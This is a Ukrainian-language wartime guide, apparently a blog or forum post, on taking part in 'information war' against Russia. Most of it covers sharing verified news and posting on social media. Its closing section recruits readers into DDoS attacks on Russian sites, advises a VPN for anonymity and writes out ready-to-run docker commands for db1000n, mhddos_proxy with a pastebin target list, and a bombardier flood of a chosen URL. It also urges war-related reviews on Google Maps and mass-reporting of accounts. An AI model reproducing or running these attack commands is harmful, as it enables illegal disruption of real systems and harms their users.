Інформаційна війна. Як приймати участь, інструменти DDOS, VPN
Інформаційний простій наразі переповнений і дуже важко відсіювати «фейки» від фактів. Мета агресора — посіяти паніку серед населення, тим самим підірвавши бойовий дух. Завдання кожного — фільтрувати новини, запобігати розповсюдженню пропагандистських закликів, сприяти розповсюдженню достовірної інформації на інфо-просторах України, Росії та інших країн.
Участь у інформаційній війні
- Поширювати та розголошувати тільки перевірену інформацію, з офіційних та довірених джерел. Не сприяти поширенню дезінформації, спрямованої на розсіювання паніки серед населення.
- Не поширювати та не розголошувати розташування та переміщення військових сил України, розміщення блокпостів, укріплень, штабів тер. оборони і тд.
- Поширювати інформацію про пересування військових сил ворога через чат-бот t.me/stop_russian_war_bot або зателефонувавши 102
- Слідкувати за новинами від перевірених телеграм-каналів та брати участь в блокуванні ресурсів, що поширюють дезінформацію та закликають до агресії проти України:
- Підтримувати петиції (напр. Ask NATO to close the sky)
- Створювати пости в соцмережах з відміткою ключових міжнародних організацій (НАТО, ООН) та застосуванням актуальних хештегів
- Поширювати інформацію через email (напр., t.me/itarmyofukraine2022/119 )
Протистояти пропаганді
- Висвітлювати у соцмережах реальну ситуацію в країні, використовуючи усі популярні канали зв’язку: Інстаграм, Фейсбук, Твітер, Тікток, Ютуб. Пости супроводжувати відміткою розташування та додаванням хештегів, наприклад: #StopRussia #StopPutin #StopWar #NoWar #Ukraine #StandWithUkraine #HelpUkraine #CloseTheSky #Russia #Putin #Россия #Украина #Война #Путин
- Телефонні дзвінки родичам та знайомим з Росії / Білорусії, розповідаючи про реальну ситуацію в країні (пост від Верховної Ради). Зокрема, можна користуватись телеграм ботом (DzvinokDrugu ), який приймає номера ваших знайомих — їм буде здійснено короткий дзвінок, та надіслана додаткова інформація.
- Залишати відгуки на Google Maps з коментарями про реальну ситуацію, про вбивство мирного населення російськими військами.
- Залишати коментарі під постами популярних російських сторінок, блогерів, особливо тих що підтримують політику кремля. Відправляти скарги на такі аккаунти з метою їх блокування на платформі у разі поширення дезінформації.
Virtual Private Network (VPN)
Важливо: Для анонімності обов’язково використовуйте VPN підключення перед використанням інструментів зазначених нижче (але НЕ корпоративний VPN!).
Рекомендований сервіс Clear VPN
Перейдіть на офіційний сайт та застосуйте промокод «SAVEUKRAINE» (безкоштовна активація на 1 рік).
VPN сервіси
Дестабілізація IT-інфраструктури Росії
Найпоширеніший та найбільш дієвий спосіб дестабілізації роботи джерел дезінформації та ресурсів, сприяючих дії агрессора — DDOS атаки.
DDOS Інструменти
Наведені нижче інструменти автоматично визначають цілі для атак. Всі додатки були встановлені та перевірені, але використовуйте їх з обережністю та на власний розсуд.
Браузерні (достатньо просто відкрити сторінку)
NOTE: це найменш ефективний спосіб
Десктопні
Консольні
- Github. Приклад запуску:
docker run --pull always ghcr.io/arriven/db1000n:latest
- Github. Приклад запуску:
docker run -it --rm --pull always portholeascend/mhddos_proxy:latest -c https://pastebin.com/raw/PA2v2zEe --debug
Цілі
Якщо є бажання особисто контролювати DDOS атаки, коригуючи цілі і постійно їх оновлювати — слідкуємо за новинами від телеграм-каналів:
Атака на конкретний ресурс:
docker run -ti --rm alpine/bombardier -c 500 -d 3600s -l https://example.com
18 коментарів
Додати коментар Підписатись на коментаріВідписатись від коментарів